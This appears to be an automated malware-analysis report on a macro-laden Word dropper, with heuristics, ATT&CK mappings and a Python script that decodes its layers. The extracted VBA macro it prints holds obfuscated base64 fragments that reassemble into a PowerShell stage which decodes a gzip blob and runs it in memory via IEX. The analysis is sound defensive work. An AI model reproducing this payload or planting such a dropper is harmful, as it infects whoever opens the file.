Verdict: MALICIOUS (risk score 184)
Malware Insights

MITRE ATT&CK:
- T1059.005 Command and Scripting Interpreter: Visual Basic
- T1566.001 Phishing: Spearphishing Attachment
- T1204.002 User Execution: Malicious File
The sample is a Word document whose VBA project contains a Document_Open auto-execution macro and a Shell() call, so arbitrary code runs as soon as the document is opened with macros enabled. The document body prompts the user to "Enable Content", the usual social-engineering lure for getting past Office macro protection. The VBA is obfuscated: most of Document_Open is padding (If tests on constant arithmetic whose outcome never changes, While loops whose counters are never read, string concatenations that are never used), while the live code builds one long string from seven base64-looking literals and passes it to Stalin(), a procedure in a second module whose body is cut off in the preview before the Shell() call is reached. The auto-exec entry point, the Shell() call and the lure together strongly suggest the macro is designed to decode or download, and then execute, a second-stage payload.
Heuristics (7)

- VBA macros detected [OLE_VBA_MACROS] (medium, 3 related findings): document contains VBA macro code.
- Shell() call in VBA [OLE_VBA_SHELL] (critical): Shell() call in VBA.
- Document_Open macro [OLE_VBA_DOCOPEN] (high): Document_Open macro, i.e. code that runs automatically when the document is opened.
- VBA p-code auto-exec with execution tokens [OLE_VBA_PCODE_AUTOEXEC_EXEC] (high): the compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
- Macro/content-enable lure [SE_ENABLE_LURE] (medium): the document instructs the user to enable macros or editing, a common technique used by malware droppers to bypass Office macro security settings.
- Suspicious extracted artifact [EXTRACTED_FILE_STATIC_TRIAGE] (info): one or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
- Embedded URL [EMBEDDED_URL] (info): one or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL. All eight URLs below were found in the document text (OLE body):
  - http://www.day.com/dam/1.0
  - http://www.w3.org/1999/02/22-rdf-syntax-ns#
  - http://ns.adobe.com/xap/1.0/
  - http://ns.adobe.com/xap/1.0/mm/
  - http://ns.adobe.com/xap/1.0/sType/ResourceRef#
  - http://ns.adobe.com/tiff/1.0/
  - http://purl.org/dc/elements/1.1/
  - http://schemas.openxmlformats.org/drawingml/2006/main

  Every one of these is an XML namespace identifier (RDF, Adobe XMP, Dublin Core, DrawingML) of the kind carried in embedded image metadata and DrawingML parts of Office files. They are not network indicators and should not be treated as C2 or download URLs.
Extracted artifacts (1)

Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 19342 bytes |

SHA-256: 69bea706a52c61f360ed3e505324ef0cd76ef2317137b7d6a68c41291b0d7ee0

Detection:
- ClamAV: no threats found
- Obfuscation or payload: likely (carved artifact contains 2 long base64-like blobs)

A clean signature result on freshly decoded macro source with randomised identifiers is not unusual; the verdict above rests on the behavioural heuristics (auto-exec entry point, Shell() call, lure), not on a signature match.
Preview script (first 1,000 lines of the extracted script):

```vb
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub Document_Open()
If 49 < 175 Then ' WAPUCu
Else ' ww0t5xznT
MsgBox "I9uxK6"
End If
If 883 - 16 = 25656 / 4276 Then
tWtyPx = "ih3bVoSB"
End If
Ujnflh = "BYvfj"
boLSU = tWtyPx & Ujnflh
yaZBUDfQ = "1Wc1VTdFNURWx0UW1SdGNuSmlOVUpKY1doblVWUjFkMDVyUnpKb1dHcFZZVVJRVEdzclEyeGxNekU0TWpOa1oyMVpRelpNVFZoSWEybDBRM1kyT1hSNVRtMW1VVUZsVmpjMk1FWkpiRk5hYm05bk1taERkRVYwT0hKNU56ZEJPRXMwTVcxM2IybG9ZWEZLVlU1TFNuaHFNSEEzZVVWQlRucFpXR0oyZWxjMVdrWnFabnBPT0c5eE1USm9UVFpaVW0xWFdUZ3JPWE5yZG10cU0yRXhhbEpYTjBvMU1FRXJUVVlyTjBGV1pXMHdUMkZVV1dobU4zbE5"
r85Ruc = "WbmxuT0ZSMFptVlRaMnBvWml0RU1XRkVkbmxSVVhGVmNXZ3JSMGd5TDBWaGMyWTRRVUZCUVNjcEtUc2dTVVZZSUNoT1pYY3RUMkpxWldOMElFbFBMbE4w"
Wy7rAvlTf = "Y21WaGJWSm"
Dim ei6Co
ei6Co = 27
While ei6Co < 515
ei6Co = ei6Co + 29
Wend
Ob3fOPNK9 = "cZwah6"
hXYUNiC8h = UnMmjfo & ei6Co
If 33 < 246 Then ' ZfnqYmM
Else ' ijg9GUyPO
MsgBox "j7Len"
End If
Dim DOdJw
DOdJw = 15
While DOdJw <= 367
DOdJw = DOdJw + 39
Wend
bBPQln = 6300
eG6i8 = HoD4Hu & DOdJw
Dim Rs7i4
Rs7i4 = yaZBUDfQ & r85Ruc & Wy7rAvlTf
bj9qMt = "xZV1JsY2loT1pYY3RUMkpxWldOMElFbFBMa052YlhCeVpYTnphVzl1TGtkNmFYQlRkSEpsWVcwb0pITXNXMGxQTGtOdmJY"
eoYIs = "QnlaWE56YVc5dUxrTnZiWEJ5WlhOemFXOXVUVzlrWlYwNk9rUmxZMjl0Y0hKbGMzTXBLU2t1VW1WaFpGUnZSVzVrS0NrNw=="
If 8 < 206 Then ' YkN6mL7
Else ' rvkBQ
MsgBox "US0Hi3z"
End If
If 22464 / 26 = 28130 / 5626 Then
eLDgA3t = "JChkAbngF"
End If
WoPDk = 23941
zEaih = eLDgA3t & WoPDk
Dim SiMtD
SiMtD = bj9qMt & eoYIs
TG2Zxc = "Y0c5M1pYSnphR1ZzYkNBa2N6MU9aWGN0VDJKcVpXTjBJRWxQTGsxbGJXOXllVk4wY21WaGJTZ3NXME52Ym5abGNuUmRPanBHY205dFFtRnpaVFkwVTNSeWFXNW5LQ2RJTkhOSlFVRkJRVUZCUVVGQk1GaFBVVlYyUkUxQ2FrYzRZU3RUVVhsRmRHSnRhMjV"
S81geDz = "4SzB4RFJVcDNTVXQxYVdkMWJESTRjRTV0TjBwaE5VeFJka3AxWWxOcU9UZDJXV2RsYmpjck9GQjVVelUzUW"
Dim j6ytS
j6ytS = 151
While j6ytS <= 274
j6ytS = j6ytS + 42
Wend
AwHabYjv = "KaS9zFM"
ujYNSv3hU = u62GYzTgt & j6ytS
Dim EShdX
EShdX = TG2Zxc & S81geDz
If 61 < 163 Then ' we0UStT
Else ' iqyRw
MsgBox "Mot70l8"
End If
Dim Tr1GHfmj
Tr1GHfmj = 252
While Tr1GHfmj <= 611
Tr1GHfmj = Tr1GHfmj + 41
Wend
ZTBYgb = 61960
j3uniCVD7 = EqaIKEOf1 & Tr1GHfmj
KZqmVIae = EShdX & Rs7i4 & SiMtD
If 20 < 128 Then ' gWP7w
Else ' QX2GbzRWQ
MsgBox "hwQRiK2ud"
End If
If 20 < 128 Then ' QKSMQ93wF
Else ' uDI4tBLJ
MsgBox "qDFcapCu"
End If
If 57 < 232 Then ' yQpuDW
Else ' FHMU2Wdu8
Debug.Print "XaJH4QpwC"
End If
If 996 + 8 = -141 + 148 Then
wYaAyhbtW = "ij97FXZ"
End If
GBHQCqbn = 14514
gmJWnsVfR = wYaAyhbtW & GBHQCqbn
If 20930 / 91 = 24724 / 3532 Then
CZz4nqGO = "DkiVmYTAv"
End If
GIvjL0Kc = "F3Yh8KrDi"
fT5FGqXSf = CZz4nqGO & GIvjL0Kc
Dim YrSbMwgBk
YrSbMwgBk = 82
While YrSbMwgBk <= 772
YrSbMwgBk = YrSbMwgBk + 30
Wend
A73k8h = 25755
MXtyNeCOQ = Jkdvl & YrSbMwgBk
Call Stalin(KZqmVIae)
End Sub

Attribute VB_Name = "qVnlqz"
Sub Stalin(p23Y5F)
If 13 < 149 Then ' uHwap2Acd
Else ' fh1IN8
MsgBox "nqOwS4ZV"
End If
Dim TfhoE
TfhoE = 60
While TfhoE < 803
TfhoE = TfhoE + 32
Wend
dc6zOs = "ZEVhzrT4Y"
NmjGdXb = XYm4eZ & TfhoE
If 12121 / 17 = -375 + 390 Then
QY0JOMl = "FHychL"
End If
fPs7evjQ = 9273
do1PN50JM = QY0JOMl & fPs7evjQ
If 46 < 187 Then ' mHtsLax
Else ' t9xAPOVY
Debug.Print "S8Bijr"
End If
If 19 < 162 Then ' VxAfKm
Else ' Cwt1Z4UMk
Debug.Print "RZOR6"
End If
Dim qagwUSe
qagwUSe = 90
While qagwUSe <= 816
qagwUSe = qagwUSe + 62
Wend
sQgDVcYHX = "tnlv71"
OUTtKo4 = Vh2IO & qagwUSe
Dim uauOH
uauOH = 141
While uauOH < 692
uauOH = uauOH + 56
Wend
hJPIueOB = "uJ5dmyFZ"
F1WNFvAEC = cAL8Xv & uauOH
Dim QMrwRpqeF
QMrwRpqeF = 141
While QMrwRpqeF < 692
QMrwRpqeF = QMrwRpqeF + 56
Wend
muxEbva = "xETI451"
b9yd5N = Q1amHCV4 & QMrwRpqeF
Dim bNoOrVY4
bNoOrVY4 = 245
While bNoOrVY4 <= 461
bNoOrVY4 = bNoOrVY4 + 59
Wend
IiA8OeG = "eTba5xOZl"
C ... (truncated)
```
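The preview cuts off before the Shell() call in Stalin(), but the argument the macro hands to Stalin() is fully visible: it is the concatenation of the seven string literals above, joined in a fixed order. The following script is an added example written for this report (it is not the analyzer's code or part of the sample) that reassembles the literals in the macro's concatenation order, copied verbatim from the preview, and peels the layers. The first two layers are plain base64; what emerges is a PowerShell one-liner that base64-decodes and gunzips an embedded blob in memory and passes the result to IEX, so the real third stage never touches disk. The script attempts that gunzip as well and reports a damaged blob rather than failing, since a single altered character in a carved preview is enough to break the gzip CRC.

```python
"""Re-assemble and decode the layered string the Document_Open macro builds."""
import base64
import gzip
import re
import zlib

# The seven string literals from the macro preview, copied verbatim. Everything
# else assigned in Document_Open is padding: If tests on constant arithmetic,
# While loops whose counters are never read, concatenations never used again.
FRAGMENTS = {
    "yaZBUDfQ": "1Wc1VTdFNURWx0UW1SdGNuSmlOVUpKY1doblVWUjFkMDVyUnpKb1dHcFZZVVJRVEdzclEyeGxNekU0TWpOa1oyMVpRelpNVFZoSWEybDBRM1kyT1hSNVRtMW1VVUZsVmpjMk1FWkpiRk5hYm05bk1taERkRVYwT0hKNU56ZEJPRXMwTVcxM2IybG9ZWEZLVlU1TFNuaHFNSEEzZVVWQlRucFpXR0oyZWxjMVdrWnFabnBPT0c5eE1USm9UVFpaVW0xWFdUZ3JPWE5yZG10cU0yRXhhbEpYTjBvMU1FRXJUVVlyTjBGV1pXMHdUMkZVV1dobU4zbE5",
    "r85Ruc": "WbmxuT0ZSMFptVlRaMnBvWml0RU1XRkVkbmxSVVhGVmNXZ3JSMGd5TDBWaGMyWTRRVUZCUVNjcEtUc2dTVVZZSUNoT1pYY3RUMkpxWldOMElFbFBMbE4w",
    "Wy7rAvlTf": "Y21WaGJWSm",
    "bj9qMt": "xZV1JsY2loT1pYY3RUMkpxWldOMElFbFBMa052YlhCeVpYTnphVzl1TGtkNmFYQlRkSEpsWVcwb0pITXNXMGxQTGtOdmJY",
    "eoYIs": "QnlaWE56YVc5dUxrTnZiWEJ5WlhOemFXOXVUVzlrWlYwNk9rUmxZMjl0Y0hKbGMzTXBLU2t1VW1WaFpGUnZSVzVrS0NrNw==",
    "TG2Zxc": "Y0c5M1pYSnphR1ZzYkNBa2N6MU9aWGN0VDJKcVpXTjBJRWxQTGsxbGJXOXllVk4wY21WaGJTZ3NXME52Ym5abGNuUmRPanBHY205dFFtRnpaVFkwVTNSeWFXNW5LQ2RJTkhOSlFVRkJRVUZCUVVGQk1GaFBVVlYyUkUxQ2FrYzRZU3RUVVhsRmRHSnRhMjV",
    "S81geDz": "4SzB4RFJVcDNTVXQxYVdkMWJESTRjRTV0TjBwaE5VeFJka3AxWWxOcU9UZDJXV2RsYmpjck9GQjVVelUzUW",
}


def reassemble(frags=FRAGMENTS):
    """Concatenate the fragments exactly as Document_Open does.

    Rs7i4    = yaZBUDfQ & r85Ruc & Wy7rAvlTf
    SiMtD    = bj9qMt & eoYIs
    EShdX    = TG2Zxc & S81geDz
    KZqmVIae = EShdX & Rs7i4 & SiMtD      (the argument passed to Stalin())
    """
    rs7i4 = frags["yaZBUDfQ"] + frags["r85Ruc"] + frags["Wy7rAvlTf"]
    simtd = frags["bj9qMt"] + frags["eoYIs"]
    eshdx = frags["TG2Zxc"] + frags["S81geDz"]
    return eshdx + rs7i4 + simtd


def b64decode_lenient(data):
    """Decode base64 that may carry stray bytes or lack padding. The fragment
    boundaries are not aligned to 4 characters, so only the final join is
    padded; stripping and re-padding makes the decode independent of that."""
    if isinstance(data, bytes):
        data = data.decode("latin-1")
    data = re.sub(r"[^A-Za-z0-9+/]", "", data)
    return base64.b64decode(data + "=" * (-len(data) % 4))


def peel_layers(argument):
    """Return (command, gzip_blob, stage3) for the string passed to Stalin().

    layer 1: base64            -> another base64 string
    layer 2: base64            -> a PowerShell one-liner with FromBase64String('...')
    layer 3: quoted blob, base64 -> gzip -> the script handed to IEX
    stage3 is None when the blob does not decompress cleanly (truncated or
    altered preview); layers 1 and 2 are still returned in that case.
    """
    layer1 = b64decode_lenient(argument)
    command = b64decode_lenient(layer1).decode("latin-1")
    match = re.search(r"FromBase64String\('([^']*)'\)", command)
    blob = match.group(1) if match else None
    stage3 = None
    if blob is not None:
        try:
            stage3 = gzip.decompress(b64decode_lenient(blob)).decode("latin-1")
        except (OSError, EOFError, zlib.error):
            stage3 = None  # damaged or truncated gzip data
    return command, blob, stage3


if __name__ == "__main__":
    cmd, blob, stage3 = peel_layers(reassemble())
    print("layer 2 (PowerShell):", cmd)
    print("layer 3 gzip blob starts:", (blob or "")[:16], "...")
    print("stage 3:", stage3 if stage3 is not None else "<blob did not decompress>")
```

The regex deliberately accepts anything up to the closing quote rather than only base64 characters, so a corrupted character in the preview shows up as a failed gunzip instead of a silently missing blob. Run the script and compare its layer-2 output with the EMBEDDED_URL list above: the namespace URIs play no part in the payload, which is consistent with the report's note that they are not detections.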